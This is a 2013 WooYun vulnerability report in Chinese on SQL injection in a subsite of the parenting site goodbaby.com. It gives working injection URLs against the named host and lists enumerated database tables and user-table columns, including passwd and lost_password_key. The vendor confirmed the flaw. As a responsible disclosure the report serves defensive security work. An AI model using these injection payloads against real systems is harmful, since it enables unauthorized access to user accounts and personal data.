漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2013-026086
漏洞标题:好孩子育儿网分站SQL注入漏洞,可爆超多信息。
相关厂商:好孩子育儿网
漏洞作者: Wenien
提交时间:2013-06-17 12:32
修复时间:2013-08-01 12:33
公开时间:2013-08-01 12:33
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:15
漏洞状态:厂商已经确认
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2013-06-17: 细节已通知厂商并且等待厂商处理中
2013-06-17: 厂商已经确认,细节仅向厂商公开
2013-06-27: 细节向核心白帽子及相关领域专家公开
2013-07-07: 细节向普通白帽子公开
2013-07-17: 细节向实习白帽子公开
2013-08-01: 细节向公众公开
简要描述:
好孩子育儿网分站存在SQL注入漏洞,可爆超多信息。
详细说明:
http://shai.goodbaby.com/tuku/?category=2 and 9=9
http://shai.goodbaby.com/tuku/?category=2 and 9=8
http://shai.goodbaby.com/tuku/?category=2 and shai_share.is_del in (1, 2) order by shai_share.create_time desc LIMIT 0,1 --
系统:linux 2.6
数据库:mysql >5
数据库名称:shai
路径:/usr/local/mysql
漏洞证明:
shai_active_user
shai_advert
shai_album
shai_category
shai_category_tag
shai_comment
shai_connector
shai_favorite_album1
shai_favorite_sharing
shai_favorite_stat
shai_follow
shai_follow_album
shai_friendlink
shai_item
shai_page_view
shai_recommend_album
shai_recommend_user
shai_report
shai_share
shai_tag
shai_user
shai_words_stop
我要列出表名么。。。。
——————————————————————
domain
avatar_local
avatar_remote
bio
bio_audit
bio_updatetime
city
create_time
email
forbiden_time
gender
is_active
is_deleted
is_forbidden
is_friend_recommend
is_guide
is_recommend
is_social
last_login_ip
last_login_time
location
lost_password_expire
lost_password_key
nickname
passwd
province
recommend_reason
recommend_time
total_albums
total_favorite_albums
total_favorite_shares
total_follow_albums
total_followers
total_follows
total_likes
total_shares
total_view
update_time
user_id
user_type
view_detail
我要列出列名么。。。。
————————————————————真有漏洞,我不搞下去了。。。。
数据量大。。。(我只想要个邀请码而已。。。。)
修复方案:
自己看着办吧。。
版权声明:转载请注明来源 Wenien@乌云
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:20
确认时间:2013-06-17 20:18
厂商回复:
感谢, 我们会尽快处理该漏洞.
最新状态:
暂无